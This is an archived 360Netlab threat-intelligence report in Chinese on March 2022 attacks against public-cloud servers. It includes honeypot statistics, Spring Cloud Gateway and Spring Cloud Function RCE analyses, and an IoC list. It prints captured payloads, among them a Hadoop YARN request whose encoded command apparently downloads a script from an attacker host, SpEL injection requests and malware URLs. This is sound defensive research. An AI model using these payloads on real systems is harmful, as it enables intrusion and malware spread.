{
	"id": "ebb9401e-7d6c-4c44-9fcc-4b4ced26e383",
	"created_at": "2026-04-06T00:19:58.045018Z",
	"updated_at": "2026-04-10T13:11:26.50089Z",
	"deleted_at": null,
	"sha1_hash": "8d23b87965698bf96bb271699bbc312c6bf292fd",
	"title": "公有云网络安全威胁情报（202203）",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3609745,
	"plain_text": "公有云网络安全威胁情报（202203）\r\nBy 360Netlab\r\nPublished: 2022-04-19 · Archived: 2026-04-05 19:52:16 UTC\r\n概述\r\n本文聚焦于云上重点资产的扫描攻击、云服务器总体攻击情况分析、热门漏洞及恶意程序的攻\r\n击威胁。\r\n360高级威胁狩猎蜜罐系统发现全球12万个云服务器IP，进行网络扫描、漏洞攻击、传播恶意软件\r\n等行为。其中包括国内156家单位的服务器IP，涉及大型央企、政府机关等行业。\r\nSpring厂商连续公开3个关键漏洞，CVE-2022-22947、CVE-2022-22963、CVE-2022-22965，本文将\r\n对前两个漏洞进行细节分析，第三个漏洞细节点此查看。\r\n本月共记录威胁攻击8亿次有余（其中包括漏洞攻击7.4亿余次、传播恶意软件超5500万次），新增\r\nIoC累计68万余个，其中针对IoT设备的漏洞攻击呈上升趋势。\r\n云上重点资产扫描攻击\r\n三月份，我们共监测到全国156个公有云重点资产存在异常扫描及攻击行为。\r\n随着业务不断上云，发生在公有云平台上的网络安全事件和威胁数量居高不下，国内重点行业包括但不\r\n限于我国的科研机构、大型企业、政府及事业单位成为攻击者的重点攻击对象，合计攻击源156个。\r\n根据所属云服务商来源，我们发现我国重点IP的云服务商以阿里云使用为主，其次为腾讯云。\r\nhttps://blog.netlab.360.com/public-cloud-threat-intelligence-202203/\r\nPage 1 of 14\n\n从漏洞利用的角度来看，攻击者主要通过SSH暴力破解、Gitlab远程命令执行漏洞、Redis远程命令执行的\r\n漏洞攻击方式对我国公有云重点IP进行攻击。\r\n下表为其中部分案例：\r\nhttps://blog.netlab.360.com/public-cloud-threat-intelligence-202203/\r\nPage 2 of 14\n\n案例1：位于北京的IP地址为39.101.*.* 的阿里云服务器，属于***联络处，访问对应域名可进入该单位**\r\n平台，其IP在3月上旬对蜜罐节点存在Telnet暴力破解行为：\r\n��telnetadmin\r\ntelnetadmin\r\nenable\r\nsystem\r\nshell\r\nsh\r\n/bin/busybox IZ1H9\r\n案例2：位于上海的IP地址为118.89.*.*的腾讯云IP属于***办公室，该IP有Apache Tomcat暴力破\r\n解,ThinkPHP漏洞, Hadoop YARN ResourceManager未授权访问漏洞等5个漏洞利用或暴力破解的恶意行\r\n为，并传播了TrojanDownloader类的恶意软件，以Hadoop YARN ResourceManager未授权访问漏洞为例，\r\n攻击Payload如下所示：\r\nPOST /ws/v1/cluster/apps HTTP/1.1\r\nHost: {target}:8088\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0\r\nContent-Length: 3742\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nContent-Type: application/json\r\nAccept-Encoding: gzip\r\nConnection: close\r\n{\r\n \"application-id\": \"application_1526990652950_72948\",\r\n \"application-name\": \"i24jndw5\",\r\n\"am-container-spec\": { \"commands\": { \"command\": \"echo Yz1odHRwOi8vMTk0LjE0NS4yMjcuMjEvbGRyLnNoP2Y5ZWRhY\r\n \"application-type\": \"YARN\"\r\n}\r\n热门漏洞攻击\r\n2022年3月1日，Spring厂商发布高危漏洞CVE-2022-22947，可能使其应用程序受到代码注入攻\r\n击。同月24日再次公开漏洞CVE-2022-22963，该漏洞影响JDK 9+上的SpringMV及WebFlux应用\r\n程序，我们发现攻击者正在利用该漏洞传播恶意软件。\r\n（1）Spring Cloud Gateway 远程代码执行漏洞(CVE-2022-22947)\r\n漏洞信息\r\n影响范围：Spring Cloud Gateway 3.1.0、3.0.0-3.0.6及不受支持的旧版本\r\nCVE编号：CVE-2022-22947\r\nhttps://blog.netlab.360.com/public-cloud-threat-intelligence-202203/\r\nPage 3 of 14\n\n披露日期：2022.03.01\r\nCVSS 3.0评分：10.0\r\n影响设备量级：千万级\r\n下图为该漏洞的攻击源IP与会话数量趋势，我们发现攻击者IP的数量和攻击者尝试利用该漏洞的次数呈现\r\n上升趋势。\r\n漏洞详情及补救措施点此查看，以下是该漏洞的技术细节分析。\r\n[漏洞补丁]\r\n在spring-cloud-gateway-server/src/main/java/org/springframework/\r\ncloud/gateway/support/ShortcutConfigurable.java中，将getValue函数中的StandardEvaluationContext替换为\r\nGatewayEvaluationContext修复SpEL表达式注入：\r\nhttps://blog.netlab.360.com/public-cloud-threat-intelligence-202203/\r\nPage 4 of 14\n\n[漏洞分析]\r\n查看函数getValue的调用，在RouteDefinitionLocator函数中，根据RouteDefinition提取GatewayFilter：\r\n根据官方文档，通过Actuator API可创建路由：\r\n 定位Actuator的控制器AbstractGatewayControllerEndpoint，根据RouteDefinition解析数据：\r\nhttps://blog.netlab.360.com/public-cloud-threat-intelligence-202203/\r\nPage 5 of 14\n\n设置断点，发送蜜罐系统捕获的payload数据：\r\nPOST /actuator/gateway/routes/hacktest HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nAccept-Language: en\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71\r\nConnection: close\r\nContent-Type: application/json\r\nContent-Length: 329\r\n{\r\n \"id\": \"hacktest\",\r\n \"filters\": [{\r\n \"name\": \"AddResponseHeader\",\r\n \"args\": {\r\n \"name\": \"Result\",\r\n \"value\": \"#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRun\r\n }\r\n }],\r\n \"uri\": \"http://example.com\"\r\n}\r\n validateRouteDefinition函数调用isAvailable函数对name进行校验：\r\n 动态调试有以下name符合条件：\r\nhttps://blog.netlab.360.com/public-cloud-threat-intelligence-202203/\r\nPage 6 of 14\n\n路由创建成功后，发送蜜罐系统捕获的refresh：\r\nPOST /actuator/gateway/refresh HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nAccept-Language: en\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n 成功触发表达式解析：\r\n（2）Spring Cloud Function SpEL表达式远程代码执行漏洞(CVE-2022-22963)\r\n漏洞信息\r\n影响版本：3.0.0.RELEASE \u003c= Spring Cloud Function \u003c= 3.2.2\r\nCVE编号：CVE-2022-22963\r\n披露日期：2022.03.24\r\nCVSS3.0评分：9.8\r\n影响设备量级：万级\r\n自24日漏洞公布后，已有攻击者尝试利用此漏洞进行恶意软件传播，如下图所示。\r\nhttps://blog.netlab.360.com/public-cloud-threat-intelligence-202203/\r\nPage 7 of 14\n\n漏洞详情及补救措施点此查看，以下是该漏洞的技术细节分析。\r\n[漏洞补丁]\r\n 在functionFromExpression新增bool类型参数isViaHeader ：\r\n 通过isViaHeader 判断，当请求数据的header头存在spring.cloud.function.routing-expression头时，调用\r\nSimpleEvaluationContext函数处理，SimpleEvaluationContext 针对不需要SpEL语言语法的全部范围且受到\r\n有意限制的表达式类别, SpEL无法调用Java类对象、引用bean, 从而修复SPEL表达式注入漏洞。\r\n[漏洞分析]\r\n 通过RoutingFunction发现位于FunctionWebRequestProcessingHelper的可疑调用：\r\n根据FunctionWebRequestProcessingHelper.processRequest调用情况发现，FunctionController接口的post请求\r\n存在调用：\r\nhttps://blog.netlab.360.com/public-cloud-threat-intelligence-202203/\r\nPage 8 of 14\n\n设置断点，发送蜜罐系统捕获的payload数据：\r\nPOST /functionRouter HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nspring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec(\"calc\")\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 4\r\ntest\r\n 在FunctionWebRequestProcessingHelper.processRequest()函数处理中，判断request对应的function为\r\nRoutingFunction类型时，将进入RoutingFunction.apply()处理：\r\n RoutingFunction.apply调用route函数，route函数从Header提取spring.cloud.function.routing-expression，然\r\n后调用functionFromExpression函数处理：\r\n functionFromExpression函数未对request做任何过滤，调用expression.getvalue()函数，存在SpEL表达式解\r\n析漏洞：\r\nhttps://blog.netlab.360.com/public-cloud-threat-intelligence-202203/\r\nPage 9 of 14\n\n云服务器攻击总体情况\r\n三月份共监测到全球超12余万个云服务器（源IP）异常访问蜜罐节点并与之交互，其中3万多个\r\nIP发生漏洞扫描和攻击行为，超7000个IP发生恶意软件传播行为，近2万个IP发生密码爆破攻击\r\n行为。\r\n三月份我们通过对全球公有云服务器的监测，共捕获云服务器威胁攻击事件近6200万次，其中包括漏洞\r\n攻击4700余万次（涉及3万多个云服务器），漏洞攻击事件共涉及1118个漏洞、传播恶意软件近1400万次\r\n（涉及7000多个云服务器）。\r\n攻击态势主要聚焦在针对Web应用和数据库的攻击、僵尸网络攻击等，攻击方式主要为暴力破解、远程命\r\n令/代码执行等，其中需要关注的是针对IoT设备的漏洞攻击逐步呈上升趋势，我们捕获到针对IoT攻击的\r\n攻击源数量超3000个，尝试攻击的会话数超200余万次。\r\n全球云服务器的三月数据中，捕获超2000个，日均传播次数超16万余次，涉及恶意程序家族38个，其中\r\n按样本捕获量以Mirai家族及其变种为首，按传播次数排名前三位的为CoinMiner、Mirai、Rootkit家族。\r\nhttps://blog.netlab.360.com/public-cloud-threat-intelligence-202203/\r\nPage 10 of 14\n\n其中国内云服务器，捕获恶意程序样本数量超400余个，日均传播次数10万余次，涉及恶意程序家族近30\r\n个，其中按样本捕获量以CoinMiner家族及其变种为首，按传播次数排名前三位的为CoinMiner、Rootkit、\r\nTrojanDownloader家族。\r\n从云服务商的情况来看，本月数量前5的云服务商是腾讯云、DigitalOcean、阿里云、亚马逊AWS和微软\r\nAzure。\r\nhttps://blog.netlab.360.com/public-cloud-threat-intelligence-202203/\r\nPage 11 of 14\n\n从漏洞攻击针对的厂商、产品分析，各类漏洞攻击的IP数量较二月有大幅度提升，尤其专注于对Redis、\r\nDocker等设备的重点攻击。\r\nhttps://blog.netlab.360.com/public-cloud-threat-intelligence-202203/\r\nPage 12 of 14\n\n从恶意软件传播情况分析，恶意挖矿类（CoinMiner）传播次数最多，木马下载器（TrojanDownloader）\r\n的传播源IP数量最多，超过5500个。\r\noracle.zzhreceive.top和bbq.zzhreceive.top是被最多IP使用的下载服务器。\r\n在密码爆破攻击方面，81.3%的云服务器IP集中在SSH协议的暴力破解上，其次是Telnet协议，占比8.8%。\r\n腾讯云和DigitalCloud是暴力破解攻击源IP最多的云服务商，3月份分别有4700+和4300+个攻击源IP。在暴\r\n力破解会话数方面，DigitalCloud遥遥领先，有多达3052万次暴力破解会话。\r\nhttps://blog.netlab.360.com/public-cloud-threat-intelligence-202203/\r\nPage 13 of 14\n\n联系我们\r\n感兴趣的读者，可以在 twitter 或者通过邮件netlab[at]360.cn联系我们。\r\nIoC List\r\nURL：\r\nhttp://14.1.98.226:8880/7z\r\nhttp://51.81.133.90/NWWW.6\r\nhttp://51.81.133.90/qweasd\r\nhttp://14.1.98.226:8880/ff.elf\r\nmd5：\r\nb9bcb150c1449dcc6a69ff1916a115ce\r\n8c47779d3ad0e925461b4fbf7d3a139d\r\n392f13b090f54438b3212005226e5d52\r\n24afae2eee766cbabf8142ef076ce1\r\nSource: https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/\r\nhttps://blog.netlab.360.com/public-cloud-threat-intelligence-202203/\r\nPage 14 of 14",
	"extraction_quality": 1,
	"language": "ZH",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/"
	],
	"report_names": [
		"public-cloud-threat-intelligence-202203"
	],
	"threat_actors": [],
	"ts_created_at": 1775434798,
	"ts_updated_at": 1775826686,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8d23b87965698bf96bb271699bbc312c6bf292fd.pdf",
		"text": "https://archive.orkl.eu/8d23b87965698bf96bb271699bbc312c6bf292fd.txt",
		"img": "https://archive.orkl.eu/8d23b87965698bf96bb271699bbc312c6bf292fd.jpg"
	}
}